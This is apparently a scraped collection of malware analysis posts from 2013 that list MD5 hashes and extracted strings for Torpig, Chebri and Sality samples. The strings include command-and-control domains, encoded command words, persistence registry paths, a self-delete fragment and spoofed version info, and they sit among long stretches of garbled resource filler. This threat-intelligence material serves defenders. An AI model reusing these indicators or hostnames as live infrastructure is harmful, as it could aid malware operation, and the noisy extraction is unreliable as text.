Wj@Y3
t7SW
   
@AA;
u,9E
^_[3
^[_3
uiSj
uY;]
pD#U
j #M
j?^;
SUVWu
_^][
QQSV
sN;E
u%C@
VWuBh
tzVS
GIt%
t/Ku
u?Vj
^95`
F;5`
~&WP
SVW3
F;5`
hH+@
uFWWj
"WWSh
9} u
E WW
tMWWS
t@9}
VSh
hH+@
SUVW
_^][
 (8PX
700WP
`h````
ppxxxx
(null)
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error
TLOSS error
SING error
DOMAIN error
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
abnormal program termination
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program:
<program name unknown>
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
CreateProcessA
CloseHandle
WriteFile
LockResource
SizeofResource
LoadResource
FindResourceA
CreateFileA
CreateDirectoryA
GetCurrentDirectoryA
GetTempPathA
SetProcessPriorityBoost
SetThreadPriority
GetCurrentThread
SetPriorityClass
GetCurrentProcess
lstrcatA
lstrcpyA
GetEnvironmentVariableA
GetShortPathNameA
GetModuleFileNameA
KERNEL32.dll
ShellExecuteA
SHChangeNotify
ShellExecuteExA
SHELL32.dll
GetModuleHandleA
GetStartupInfoA
GetCommandLineA
GetVersion
ExitProcess
TerminateProcess
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetVersionExA
HeapDestroy
HeapCreate
VirtualFree
HeapFree
RtlUnwind
GetLastError
SetFilePointer
HeapAlloc
GetCPInfo
GetACP
GetOEMCP
VirtualAlloc
HeapReAlloc
GetProcAddress
LoadLibraryA
SetStdHandle
MultiByteToWideChar
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
FlushFileBuffers
ATI Negative News.pdf
%s\%s
spoolsu.exe
open
\ATI Negative News
\~unzip012~
Open
 > nul
/c del
COMSPEC
!This program cannot be run in DOS mode.
cRich
.text
`.rdata
@.data
PhT@D
hT@D
Qh$q@
hT@D
hTDD
hXDD
h,q@
Qh8q@
h<q@
t$j/
h@q@
hHq@
hLq@
h\q@
hT@D
hdDD
hhDD
h$p@
hdp@
%``@
%d`@
%p`@
%x`@
hSVW
5lDD
>"u:F
XPVSS
%H`@
%D`@
Sleep
GetShortPathNameA
GetModuleFileNameA
GetProcAddress
LoadLibraryA
GetLongPathNameA
GetTempPathA
lstrlenA
KERNEL32.dll
WS2_32.dll
RegCloseKey
RegSetValueExA
RegCreateKeyA
RegOpenKeyA
ADVAPI32.dll
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCloseHandle
InternetConnectA
InternetOpenA
WININET.dll
atoi
strcat
strcpy
fclose
fflush
??3@YAXPAX@Z
fwrite
memset
fopen
strrchr
??2@YAPAXI@Z
atol
sscanf
_purecall
strlen
MSVCRT.dll
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
GetModuleHandleA
GetStartupInfoA
rijndael
.firstwillnessclub.com
/old/google.png
cXVpdA==
Y21k
c2xlZXA=
dW5zdXBwb3J0
Y29ubmVjdA==
+Mozilla/4.0 (compatible; MSIE 8.0; Win32)
%s %s
HTTP/1.1
.exe
kernel32.dll
CreateProcessA
1234567890123456
HTTP/1.1
Software\Microsoft\Windows NT\CurrentVersion\Windows
load
733333333333333333333330?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
3333333330
?{{{{{{{{{{{0
?{{{{{{{{{0
?{{{{{{{0
3333330
333333333333330
{{{{{{{{{{{{{{0
{{{{{{{{{{{{{{0
{{{{{{{{{{{{{{0
{{{{{{{{{{{{{{0
{{{{{{{{{{{{{{0
{{{{{{{{{{{{{{0
{{{{{{{{{{{{{{0
{{{{{{{{{{{{{{0
{{{{{{{{{{{{{{0
wwwwwww
{{{{{x
{{{{{x
{{{{{x
{{{{{x
lllll
[q~b[Fllll
ha[]dlll
nKB\`lll
[f}tttttttttt
nKG[llll
ha[llll
XwwwwwwwwwwwwwwSSSTTpNJBllll
SSSSSSSSSSSSSSTTTTTTTTT:kK^l
<<<<<<<<<<<<<<<<<<<<<<<<<<u9l
A><<<<<<<<<<<<<<<<<<<<<<<<<<
V211111111111111111111111111
2((((((((((((((((((((((((((
|%##########################
[iix
*'5[Dj
"'/5H[DPY
._j=
! 6J[[Lj=
! 6J[[
DDDDl
-Yjoz{
[[[[[jxzW
[[[[[[[[
[[[[[[[[7
lllll
[fPFMlllll
[sTtpk
_glllll
wwww
nhGFlllll
[i>wTTTTTTTTwpN
IMlll
[i)<<<<<<<<<<<<<<:nK_l
[i}<<<<<<<<<<<<<<<<<wl
[c*(((((((((((((((((wl
>X_l
2Xil
[>6cj0
2Aml
"' 6Hx
.LjR=W
 .Jbjx=
[[[[[Y
[[[[[[
[[[[[[[
rllll
7lllll
[o>w
h7dllll
[o>wSSTTTw:nLglll
[o2T<<<<<<<11<t9Ll
[o$(111111111((#
[$9s=
yyyy3Wq
33$?m[
[[[[[[
[[[[[[
ddddddddddddd
IIIIIIIIIIIIIId7
ttttttttj
<<<<<<<T
1111111(o
Id7TI
Id7(1IIIIIIIIIIII
IIIII`
7777
444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444
44444
555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555
4444
??????????????????????????????????????????????????????????????????????????????????????????
4444
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB6
4444
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB6
4444
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB6
4444
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB6
4444
DBBEBCEBBBCBBBEDDBBBDCCBBBBCBBCBBDDBCBBBCCCBCBBCBBEDBDEBCCBBCDBCEBCBCBBBBBBDCCDCCBDDDCBBD6
4444
EEECEEEEEBCCBCBEBEBECCBEEBCCEDECEEEDDBCDBECBEECECCECEEEBEDDBCEEBBDEEEEBBECCEDEEEEDBCECBBC6
4444
EEEEEEEEEEEEEEEEEEEEECDEEEEEDEECECEEEDEEEEEEEDECEDEEEEEEEECECEEECEEEBEEEECEBECCEEEEEEEEEE7
4444
EEEEEFEGEFFEGFGEEEEEFEGEFHFGGEEEEEGHEFFEFEEFFFEFEEEEHEGFEHEEGEEEFEEEEHEEEEEEFEEEEFGGEFFFE7
4444
FHHHHFGFHGFHFGEFFEFFHEFEFFFFFFFFGHHHFHGHHHFHHHHFGFGFGHGGEHFHFGGHGGGGHHFFHGHGFFEEEHHEHGHHF8
4444
HIHIIIKHJKKHHIHKHKHKIJKHIJHJIHIJHKJHHHHHIJIIIKHIHIIHHIKIKKKIKIJJIIHKIHKJJJIIKKHHHKHKHIIIH:
4444
KKKIKKKKKKKKIKIIKIKKKKKIKKKKKKKIKKKKKKKKKKIIKKKKKKIKKKKKIKKKIIKKKKIKKLKKKKKKKKIKKKKIIKKKK9
4444
LMLLLKKNKKNLMKKLKKLLKLKKLKNLLKLLLKKLLMKKNKLNKKNLLKLNMKKLKLKKNNMMLMLLNLKMKKLMKLKLLNKLKLNNL;
4444
NNNNMNNNNNLNLLNNNNLLNNLLNNLNNNNLLNLLNLNLNNLLLLNNMNLLNLLNNNNLNLNLLLNNNNLLLNLNNNNNNNLNNLLLN>
4444
OOONOOONOQNONONOOONONONOONONNORONOQNONOOOONRNORNNQNNOOONOOOONOOOQOQONOQNNRONQNNOORNOONNNN<
4444
RRRRRRRROORORRROOORRRORROORRRRRORRRORROOPRRRRORROORRRRRRROROROOSRRRRRRORRRRRRRROORRORRRRR<
4444
RSSRRRRSSSRRSVRSRRRSSSSRVSSRRSRRSRSSSSSSUURSSRRRSSRSUSUSVSRSSRURSRRSSUSVURSSSSSRRVRSRRVVS=
4444
SSVVVVSVVTSSTVTVTSTVVVVWTSTVVWTVVVVVVVVSVSSSSSVSWSSWWVVVVSSVVVVVSVVVSVVVVVWVSSVVVWSVVSSSS@
4444
WVZWWWVWWZZWWWVWWWWWWVWWWYZWWWWWVWVWWVWWVZZZWWWWWWWZWZWWWVWWVZWWWWWWYYWVWWVWWWWZZZWWYVWWV@
4444
Z[Z[WWZZWWZZZXXZZZZWZXZZ[X[[[ZZWZZZZZWZZXWWZXZWZWZZZZZZZZZ[ZW[ZZ[ZZ[ZWWZ[[ZZWZZZZ[[WZZZZZA
4444
[[^[^[^[[]^[^[[[[[[[[[^^[[[[^^[[[[[^^[[[^^[[[[[[[^]^[[[[^[[^^[[[^ZZ[[^[[[^^^^[[ZZ[[][[[[^-
4444
^_^\^_\^[__^^_^^__^^^^___^__^\_\\_^^^^\^^_[__^^__^_^__^^\[^^_^_^^_^\_^_^^\^\^[^[[__^\^^^\-
4444
ba_`__aa_____aaaab__a_aa``ab__a__a___b__a____`___a__a______a_a_b_a__a__`_aa`a__aa_abaa``a.
4444
abbbbbbbababbabebababbbbbbbbbbbbbbbbbabaaababbabbbbbbaabbabbaabbabbdbabbbaaabbabbabababbb.
4444
eeebeccbefbefefeffbbbeffeecbfbeeeebefebebefbceefeceefefffffbfebeebeeebebfeebfecbbbeeecffc/
4444
ffiffffffffififfffffffffffffieffffffffffiifffiiffffiffiifffffffiffffffiffffffhffffffffiif/
4444
ijjgijggjfifjjgijijjjjigjijgjiiijijjiiiffjijjjjjjijjijijjiijiijjjiigfijjjjjijjjjjjjgijjjj0
4444
jjmjjjjjllllljjjkljlkjjmljljljjjkkjjjmkljjjjkjjjmljjklljljljjjkllkjmjjlljlkllmkllkklljllj1
4444
mmlmmlmmmmlmmmmmkmmlmmlmmmmmmmmmmmmmmmmmlmmmmlmmlmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm2
4444
npoppnomnomnmppnopomopommmnopmpnmonpppomopmooopmoppponpppmmpnompmompopnnompnopmmmmmoopoom2
4444
ppppppqpppppppppsqpqprpppppppprpqppqrrprpqspppqrppprpppprqqrppppqpppprprpqpppqppppppppppr'
4444
pssssssqrssssssspqssssssprqsssssssqrqssqsrrsqssrrqrsssrqsspsqqsspsqqsssspsssssqqqrrsqssss(
4444
vtwvtvvttstvwwvtwsvsswvtsvtsvtwstwvsssvvtsssssswvswsssswsttvsssswwsssvwstwvswvssswtvvsvvv(
4444
wwwwwwwwwwwwxwwwxwwwwwwwwwwtwwwwwwxwwwwwuwwwwwwxtwwwwwwwwwwwwwwwwwwxwxwwwwwwwwwwwwwxwwwww)
4444
xyyzzzwyzyzzzzwzwwxzzyxzzzyyzzxxzzwxxxyxxxzzzzxyyyywzzzxyyxzzxzxzxyywyzzzwxxzxzyyxzzxwzzz*
4444
xyyzzzwyzyzzzzwzwwxzzyxzzzyyzzxxzzwxxzz|zz|{zzz{|zzz{z{zzzzzzz|z{z{z{{z{zzzzzz{{{zzz{z{{{+
4444
zz{{zz|{zzzzzz|}zzzzzzzzzz{z{|zz{zzz|{}}}}{}}}}{}{}}}}{}}}}{}}}}}}}{}}{}{}}{{}}zz}}}{}}}},
4444
}}}{{{}}}{{}{{{}}{}}{{}}}{}}}{z}{}}{}{}}}}{}}}}{}{}}}}{}}}}{}}}}}}}{}}{}{}}{{}}zz}}}{}}}},
4444
}}}~}~}~~~~~}~~~~
~~~}~}}
}}~~~
}~}}~}}~~}~~~~~~~~
}~~}
~~~}}
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
44444
333333333333333333333333333333333333333333333333333333333333333333333
4444444
333333333333333
444444444
33333333333333
4444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444
MS User
MS Us
MS User
Micro
bjbjqPqP
 & 6"

Unicode Strings:
---------------------------------------------------------------------------
jjjjjj
(null)
         (((((                  H
IDI_ICON1
jjjj
jjjj
jjjjjjj
jjjj
jjjj
Root Entry
Root Entry
1Table
CompObj
WordDocument
SummaryInformation
DocumentSummaryInformation
Unknown
Times New Roman
Symbol
Arial
SimSun
!),.:;?]}
MS User
MS User

Search

Torpig miniloader strings - CRIME

August 16, 2013, 4:47 am
$
0
0
File: Torpig miniloader_0F82964CF39056402EE2DE9193635B34
MD5:  0f82964cf39056402ee2de9193635b34
Size: 242688






Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Richw]
.text
`.data
.rsrc
becH
C:\TEST\bar.txt
RSDS
packaigee.pdb
9Jhu
---------------------snip
<Tv6
UrlIsW
PathGetDriveNumberA
SHRegWriteUSValueW
StrFormatKBSizeW
PathIsDirectoryA
PathIsDirectoryEmptyA
PathRemoveBlanksA
SHLWAPI.dll
EnumResourceLanguagesA
VirtualAlloc
FillConsoleOutputCharacterW
SetEvent
GetDriveTypeA
DosDateTimeToFileTime
HeapAlloc
ClearCommBreak
WriteFileEx
InterlockedIncrement
OpenEventW
OpenThread
CreateTimerQueue
RemoveDirectoryW
GetProcessHeap
GetFileInformationByHandle
WritePrivateProfileStructA
SetVolumeMountPointW
GetVolumeInformationW
RequestDeviceWakeup
MapUserPhysicalPages
GetFullPathNameA
GetFileSize
GetThreadContext
FreeConsole
SizeofResource
GetBinaryTypeA
GetPrivateProfileIntW
FindVolumeClose
SetMailslotInfo
kernel32.dll
fQlk
----------------------------snip
Unicode Strings:
---------------------------------------------------------------------------
VS_VERSION_INFO
StringFileInfo
040904E4
CompanyName
Brau Holding International AG
FileDescription
Paulaner tool
FileVersion
4.0.0012
InternalName
paulaner.exe
LegalCopyright
 Brau Holding International AG. All rights reserved.
OriginalFilename
paulaner.exe
ProductName
Brau Holding International AG
 Paulaner tool
ProductVersion
4.0.0012
VarFileInfo
Translation
====================================
File: Torpig miniloader_83419EEA712182C1054615E4EC7B8CBE
MD5:  83419eea712182c1054615e4ec7b8cbe
Size: 247808

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Richw]
.text
`.data
.rsrc
becH
C:\TEST\bar.txt
RSDS</
nantietive.pdb
IM9M
=jsk
-------------------------snip
R64XR
p0Drt
<Tv6
UrlIsW
PathGetDriveNumberA
SHRegWriteUSValueW
StrFormatKBSizeW
PathIsDirectoryA
PathIsDirectoryEmptyA
PathRemoveBlanksA
SHLWAPI.dll
EnumResourceLanguagesA
VirtualAlloc
FillConsoleOutputCharacterW
SetEvent
GetDriveTypeA
DosDateTimeToFileTime
HeapAlloc
ClearCommBreak
WriteFileEx
InterlockedIncrement
OpenEventW
OpenThread
CreateTimerQueue
RemoveDirectoryW
GetProcessHeap
GetFileInformationByHandle
WritePrivateProfileStructA
SetVolumeMountPointW
GetVolumeInformationW
RequestDeviceWakeup
MapUserPhysicalPages
GetFullPathNameA
GetFileSize
GetThreadContext
FreeConsole
SizeofResource
GetBinaryTypeA
GetPrivateProfileIntW
FindVolumeClose
SetMailslotInfo
kernel32.dll
]o=+{
ttH_r
--------------------------snip

Unicode Strings:
---------------------------------------------------------------------------
VS_VERSION_INFO
StringFileInfo
040904E4
CompanyName
Brau Holding International AG
FileDescription
Paulaner tool
FileVersion
4.0.0012
InternalName
paulaner.exe
LegalCopyright
 Brau Holding International AG. All rights reserved.
OriginalFilename
paulaner.exe
ProductName
Brau Holding International AG
 Paulaner tool
ProductVersion
4.0.0012
VarFileInfo


Chebri.C strings - CRIME

August 16, 2013, 4:51 am
$
0
0
File: Chebri_B605C8E99315C330A015F36DE2A870EE
MD5:  b605c8e99315c330a015f36de2a870ee
Size: 8704






Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
jRich
.text
.rdata
@.data
.reloc
iqsoyyo
czgorvv
dzzrsap
acndvrb
hkppjev
nbdcisi
Rh~f
Rh~f
h4A@
%|0@
%t0@
%p0@
%l0@
%x0@
WS2_32.dll
SHSetValueW
SHLWAPI.dll
ExitProcess
lstrlenA
CreateProcessW
WaitForSingleObject
GetModuleHandleW
GetTickCount
Sleep
CopyFileW
GetFileAttributesW
GetModuleFileNameW
lstrlenW
GetLastError
LocalAlloc
lstrcatW
CreateMutexA
ReleaseMutex
CloseHandle
LocalFree
CreateThread
KERNEL32.dll
wsprintfW
USER32.dll
ShellExecuteW
SHGetSpecialFolderPathW
SHELL32.dll
AANCHODAACHEV_AND_BRIANKREBS_GOT_MARRIED
24131194125.com
>3>8>>>D>O>U>a>s>
F0S0`0t0
0:1F1R1]1j1w1
2%2.272?2H2T2_2l2
3$303I3k3p3
4$4*40464<4B4H4N4T4Z4`4

Unicode Strings:
---------------------------------------------------------------------------
\regsrv33.exe
dows\Cur
Soft
ware\
on\R
Microso
rentVersi
ft\Win
%s%s%s%s%s%s%s%s
Microsoft DLL Registaation
regsrv33.exe


=======================
File: Chebri_B1960078B67184BFBE3A1B351DC38471
MD5:  b1960078b67184bfbe3a1b351dc38471
Size: 8704

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
jRich
.text
.rdata
.data
.reloc
Rh~f
Rh~f
h4A@
%|0@
%t0@
%p0@
%l0@
%x0@
WS2_32.dll
SHSetValueW
SHLWAPI.dll
ExitProcess
lstrlenA
CreateProcessW
WaitForSingleObject
GetModuleHandleW
GetTickCount
Sleep
CopyFileW
GetFileAttributesW
GetModuleFileNameW
lstrlenW
GetLastError
LocalAlloc
lstrcatW
CreateMutexA
ReleaseMutex
CloseHandle
LocalFree
CreateThread
KERNEL32.dll
wsprintfW
USER32.dll
ShellExecuteW
SHGetSpecialFolderPathW
SHELL32.dll
DANCHODANCHEV_END_BRIANKREBS_GOT_FARRIED
aquartmale.org
>3>8>>>D>O>U>a>s>
F0S0`0t0
0:1F1R1]1j1w1
2%2.272?2H2T2_2l2
3$303I3k3p3
4$4*40464<4B4H4N4T4Z4`4

Unicode Strings:
---------------------------------------------------------------------------
\regsrv34.exe
dows\Cur
Soft
ware\
on\R
Microso
rentVersi
ft\Win
%s%s%s%s%s%s%s%s
Microsoft DLL Registrations
regsrv34.exe

=================================
File: Chebri_AF93638AC05F9636550C1959127D1471
MD5:  af93638ac05f9636550c1959127d1471
Size: 7964

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
jRich
.text
`.rdata
@.data
.reloc
Rh~f
Rh~f
h4A@
%|0@
%t0@
%p0@
%l0@
%x0@
WS2_32.dll
SHSetValueW
SHLWAPI.dll
ExitProcess
lstrlenA
CreateProcessW
WaitForSingleObject
GetModuleHandleW
GetTickCount
Sleep
CopyFileW
GetFileAttributesW
GetModuleFileNameW
lstrlenW
GetLastError
LocalAlloc
lstrcatW
CreateMutexA
ReleaseMutex
CloseHandle
LocalFree
CreateThread
KERNEL32.dll
wsprintfW
USER32.dll
ShellExecuteW
SHGetSpecialFolderPathW
SHELL32.dll
AANCHODANCHEV_AND_BRIANKREBS_GOT_MARRIED

Unicode Strings:
---------------------------------------------------------------------------
\regsrv32.exe
dows\Cur
Soft
ware\
on\R
Microso
rentVersi
ft\Win
%s%s%s%s%s%s%s%s
Microsoft DLL Registaation


Sality strings - CRIME

August 17, 2013, 9:23 am
$
0
0
File: sality
MD5:  ceaf4d9e1f408299144e75d7f29c1810
Size: 997537






Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
"RichVE
.text
.rdata
.data
.rsrc
.penask
.adata
. rdata
O$47E
`H,V+-
[<<v------------------------------------------snip
[^YX
kernel32.dll
ExitProcess
user32.dll
MessageBoxA
wsprintfA
LOADER ERROR
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
 (08@P`p
|$,3
T$ v
(C@;
t$h3
D4l|M
_^]2
;;F,s
,;F0s
 ;F4s
;F8s
0:@D
_^][
T4$F
`u(j
L4#H
L4$F
_^][
_^][
_^][
D$$W3
5:@D
D$ %
;|$(
8_^]
_^]2
kernel32.dll
GetProcAddress
GetModuleHandleA
LoadLibraryA
advapi32.dll
comctl32.dll
comdlg32.dll
gdi32.dll
mpr.dll
ole32.dll
oleaut32.dll
shell32.dll
user32.dll
version.dll
winmm.dll
wsock32.dll
RegEnumValueW
ImageList_EndDrag
GetSaveFileNameW
MoveToEx
WNetUseConnectionW
OleSetContainedObject
DragQueryPoint
GetWindowTextLengthW
GetFileVersionInfoSizeW
waveOutSetVolume
444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444
44444
555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555
4444
??????????????????????????????????????????????????????????????????????????????????????????
4444
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB6
4444
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB6
4444
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB6
4444
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB6
4444
DBBEBCEBBBCBBBEDDBBBDCCBBBBCBBCBBDDBCBBBCCCBCBBCBBEDBDEBCCBBCDBCEBCBCBBBBBBDCCDCCBDDDCBBD6
4444
EEECEEEEEBCCBCBEBEBECCBEEBCCEDECEEEDDBCDBECBEECECCECEEEBEDDBCEEBBDEEEEBBECCEDEEEEDBCECBBC6
4444
EEEEEEEEEEEEEEEEEEEEECDEEEEEDEECECEEEDEEEEEEEDECEDEEEEEEEECECEEECEEEBEEEECEBECCEEEEEEEEEE7
4444
EEEEEFEGEFFEGFGEEEEEFEGEFHFGGEEEEEGHEFFEFEEFFFEFEEEEHEGFEHEEGEEEFEEEEHEEEEEEFEEEEFGGEFFFE7
4444
FHHHHFGFHGFHFGEFFEFFHEFEFFFFFFFFGHHHFHGHHHFHHHHFGFGFGHGGEHFHFGGHGGGGHHFFHGHGFFEEEHHEHGHHF8
4444
HIHIIIKHJKKHHIHKHKHKIJKHIJHJIHIJHKJHHHHHIJIIIKHIHIIHHIKIKKKIKIJJIIHKIHKJJJIIKKHHHKHKHIIIH:
4444
KKKIKKKKKKKKIKIIKIKKKKKIKKKKKKKIKKKKKKKKKKIIKKKKKKIKKKKKIKKKIIKKKKIKKLKKKKKKKKIKKKKIIKKKK9
4444
LMLLLKKNKKNLMKKLKKLLKLKKLKNLLKLLLKKLLMKKNKLNKKNLLKLNMKKLKLKKNNMMLMLLNLKMKKLMKLKLLNKLKLNNL;
4444
NNNNMNNNNNLNLLNNNNLLNNLLNNLNNNNLLNLLNLNLNNLLLLNNMNLLNLLNNNNLNLNLLLNNNNLLLNLNNNNNNNLNNLLLN>
4444
OOONOOONOQNONONOOONONONOONONNORONOQNONOOOONRNORNNQNNOOONOOOONOOOQOQONOQNNRONQNNOORNOONNNN<
4444
RRRRRRRROORORRROOORRRORROORRRRRORRRORROOPRRRRORROORRRRRRROROROOSRRRRRRORRRRRRRROORRORRRRR<
4444
RSSRRRRSSSRRSVRSRRRSSSSRVSSRRSRRSRSSSSSSUURSSRRRSSRSUSUSVSRSSRURSRRSSUSVURSSSSSRRVRSRRVVS=
4444
SSVVVVSVVTSSTVTVTSTVVVVWTSTVVWTVVVVVVVVSVSSSSSVSWSSWWVVVVSSVVVVVSVVVSVVVVVWVSSVVVWSVVSSSS@
4444
WVZWWWVWWZZWWWVWWWWWWVWWWYZWWWWWVWVWWVWWVZZZWWWWWWWZWZWWWVWWVZWWWWWWYYWVWWVWWWWZZZWWYVWWV@
4444
Z[Z[WWZZWWZZZXXZZZZWZXZZ[X[[[ZZWZZZZZWZZXWWZXZWZWZZZZZZZZZ[ZW[ZZ[ZZ[ZWWZ[[ZZWZZZZ[[WZZZZZA
4444
[[^[^[^[[]^[^[[[[[[[[[^^[[[[^^[[[[[^^[[[^^[[[[[[[^]^[[[[^[[^^[[[^ZZ[[^[[[^^^^[[ZZ[[][[[[^-
4444
^_^\^_\^[__^^_^^__^^^^___^__^\_\\_^^^^\^^_[__^^__^_^__^^\[^^_^_^^_^\_^_^^\^\^[^[[__^\^^^\-
4444
ba_`__aa_____aaaab__a_aa``ab__a__a___b__a____`___a__a______a_a_b_a__a__`_aa`a__aa_abaa``a.
4444
abbbbbbbababbabebababbbbbbbbbbbbbbbbbabaaababbabbbbbbaabbabbaabbabbdbabbbaaabbabbabababbb.
4444
eeebeccbefbefefeffbbbeffeecbfbeeeeb
efebebefbceefeceefefffffbfebeebeeebebfeebfecbbbeeecffc/
4444
ffiffffffffififfffffffffffffieffffffffffiifffiiffffiffiifffffffiffffffiffffffhffffffffiif/
4444
ijjgijggjfifjjgijijjjjigjijgjiiijijjiiiffjijjjjjjijjijijjiijiijjjiigfijjjjjijjjjjjjgijjjj0
4444
jjmjjjjjllllljjjkljlkjjmljljljjjkkjjjmkljjjjkjjjmljjklljljljjjkllkjmjjlljlkllmkllkklljllj1
4444
mmlmmlmmmmlmmmmmkmmlmmlmmmmmmmmmmmmmmmmmlmmmmlmmlmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm2
4444
npoppnomnomnmppnopomopommmnopmpnmonpppomopmooopmoppponpppmmpnompmompopnnompnopmmmmmoopoom2
4444
ppppppqpppppppppsqpqprpppppppprpqppqrrprpqspppqrppprpppprqqrppppqpppprprpqpppqppppppppppr'
4444
pssssssqrssssssspqssssssprqsssssssqrqssqsrrsqssrrqrsssrqsspsqqsspsqqsssspsssssqqqrrsqssss(
4444
vtwvtvvttstvwwvtwsvsswvtsvtsvtwstwvsssvvtsssssswvswsssswsttvsssswwsssvwstwvswvssswtvvsvvv(
4444
wwwwwwwwwwwwxwwwxwwwwwwwwwwtwwwwwwxwwwwwuwwwwwwxtwwwwwwwwwwwwwwwwwwxwxwwwwwwwwwwwwwxwwwww)
4444
xyyzzzwyzyzzzzwzwwxzzyxzzzyyzzxxzzwxxxyxxxzzzzxyyyywzzzxyyxzzxzxzxyywyzzzwxxzxzyyxzzxwzzz*
4444
xyyzzzwyzyzzzzwzwwxzzyxzzzyyzzxxzzwxxzz|zz|{zzz{|zzz{z{zzzzzzz|z{z{z{{z{zzzzzz{{{zzz{z{{{+
4444
zz{{zz|{zzzzzz|}zzzzzzzzzz{z{|zz{zzz|{}}}}{}}}}{}{}}}}{}}}}{}}}}}}}{}}{}{}}{{}}zz}}}{}}}},
4444
}}}{{{}}}{{}{{{}}{}}{{}}}{}}}{z}{}}{}{}}}}{}}}}{}{}}}}{}}}}{}}}}}}}{}}{}{}}{{}}zz}}}{}}}},
4444
}}}~}~}~~~~~}~~~~
~~~}~}}
}}~~~
}~}}~}}~~}~~~~~~~~
}~~}
~~~}}
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
4444
44444
333333333333333333333333333333333333333333333333333333333333333333333
4444444
333333333333333
444444444
33333333333333
4444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444
444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444
ddddddddddddd
IIIIIIIIIIIIIId7
ttttttttj
<<<<<<<T
1111111(o
Id7TI
Id7(1IIIIIIIIIIII
IIIII`
7777
rllll
7lllll
[o>w
h7dllll
[o>wSSTTTw:nLglll
[o2T<<<<<<<11<t9Ll
[o$(111111111((#
[$9s=
